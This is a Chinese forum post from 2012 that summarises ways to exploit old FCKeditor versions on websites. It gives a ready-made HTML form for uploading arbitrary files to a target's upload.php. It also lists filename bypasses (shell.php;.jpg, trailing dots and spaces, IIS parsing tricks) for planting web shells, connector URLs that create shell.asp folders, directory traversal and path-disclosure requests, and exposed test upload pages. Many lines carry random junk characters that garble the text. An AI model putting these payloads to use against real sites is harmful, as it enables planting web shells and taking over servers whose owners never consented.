|
Fckeditor漏洞利用总结 查看编辑器版本3 ]5 B) N- j6 X) z7 Z
FCKeditor/_whatsnew.html% S3 z3 L1 k0 R5 n+ C t) t# t! ]
————————————————————————————————————————————————————————————— 2. Version 2.2 版本8 L! M- H5 i) O7 V8 F/ p& n
Apache+linux 环境下在上传文件后面加个.突破!测试通过。! U8 v5 ^* _5 \+ a+ o9 V2 O
————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。( n k, E5 ?4 {0 ~9 b
<form id="frmUpload" enctype="multipart/form-data"
2 w! }3 }9 R; g1 n4 L# \& H: Jaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>' ~) f- h, \9 h4 k
<input type="file" name="NewFile" size="50"><br>
$ c4 J! v9 N: a/ [; ~<input id="btnUpload" type="submit" value="Upload">
+ i# e9 s1 c2 I# \+ H# d0 M4 I</form>
" y9 @, \: a7 B3 O7 O c————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
: r( W% s' C5 q9 n$ C 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。3 t" h& ~7 ?8 y+ M
4.1:提交shell.php+空格绕过
9 S" K Y3 k/ S不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
) Q) Y* Q) y$ }. k# A% {/ J) v* k; z 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
5 d& C& V9 p* H ~" K————————————————————————————————————————————————————————————— 5. 突破建立文件夹% o6 ~6 e1 U2 t# f
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684( P" a' L$ O/ z! {8 E: d5 a
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp8 P; b# z9 z" i. g3 X1 X: T% E* q- m
————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址
2 y. z ^: f: ^& h8 OFCKeditor/editor/filemanager/browser/default/connectors/test.html
( g2 j. M3 r5 OFCKeditor/editor/filemanager/upload/test.html
# U) t* g! Z) ~, N" I* ]7 M; lFCKeditor/editor/filemanager/connectors/test.html: i3 a+ S2 E: d9 w5 c
FCKeditor/editor/filemanager/connectors/uploadtest.html$ b1 q& B: G' _. G% U ^
—————————————————————————————————————————————————————————————2 k2 F9 j+ R1 N8 q
7.常用上传地址9 W# @2 N0 m3 j1 b* c% p
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
. O" l/ X4 O% w' DFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp) I8 C1 Q' B5 ]& ^( s, |+ J
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)" K( [' w* _& O# M7 B" {4 }
JSP 版:
+ H" q) c9 L, A2 u5 rFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp3 v& [" R& S9 y" }6 A; J4 d
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
' M; |' n2 J& X/ j, [1 i. |件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。 L' H+ e' ?6 O. H, a
————————————————————————————————————————————————————————————— 8.其他上传地址
0 G: _8 h z7 ~; G5 A1 q/ RFCKeditor/_samples/default.html2 c& ]' g% } \- K6 ]
FCKeditor/_samples/asp/sample01.asp* {/ p9 f$ b0 g6 R
FCKeditor/_samples/asp/sample02.asp3 E' v' F% m3 Y2 k
FCKeditor/_samples/asp/sample03.asp9 r" p% y) _5 q+ K; B
FCKeditor/_samples/asp/sample04.asp) t" l! i" {- F) }0 T1 X" X
一般很多站点都已删除_samples 目录,可以试试。
6 |2 p: n/ ^+ J% G$ ~0 x z& XFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
i# y4 I Q- x( a- {# x————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址" U5 K/ Y" X! r$ W. N
Version 2.4.1 测试通过
; M' @1 P1 `4 ^/ F( ]' U2 V修改CurrentFolder 参数使用 ../../来进入不同的目录. d( O, {& W# D& b3 I( r% p/ E; o# }9 Z% ^
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
( N" k- [& |( N; B0 O根据返回的XML 信息可以查看网站所有的目录。( q3 P/ s) m' a
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
1 n- }* M7 C$ P( z也可以直接浏览盘符:4 x+ o1 p) l2 I0 L% t: x
JSP 版本:' s% \; ~" J$ Z& j1 `( x
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
# k* U6 R4 n Y0 w8 L6 b————————————————————————————————————————————————————————————— 10.爆路径漏洞
+ X. T6 l, R. ]$ b" _7 R/ _FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
% c" W; a# B, n$ i* s4 H: N————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题0 b, ]. o R. j ^9 u! ?+ T4 S
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
; t" d9 g, L' w6 c H/ H$ O脆弱描述:
1 y$ |5 ^2 g: U" \# jFCKeditor v2.4.3 中File 类别默认拒绝上传类型:
* b0 B, J3 C) P+ fhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
L X: T! x+ v$ A& m; _ w' T5 }Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!$ m" F" c4 r" m7 N, @' m( ^7 u
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。* Y0 u8 Z9 L6 K8 a% V g( j! k
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! | 
发表于 2012-9-5 20:23:31
收藏
支持
反对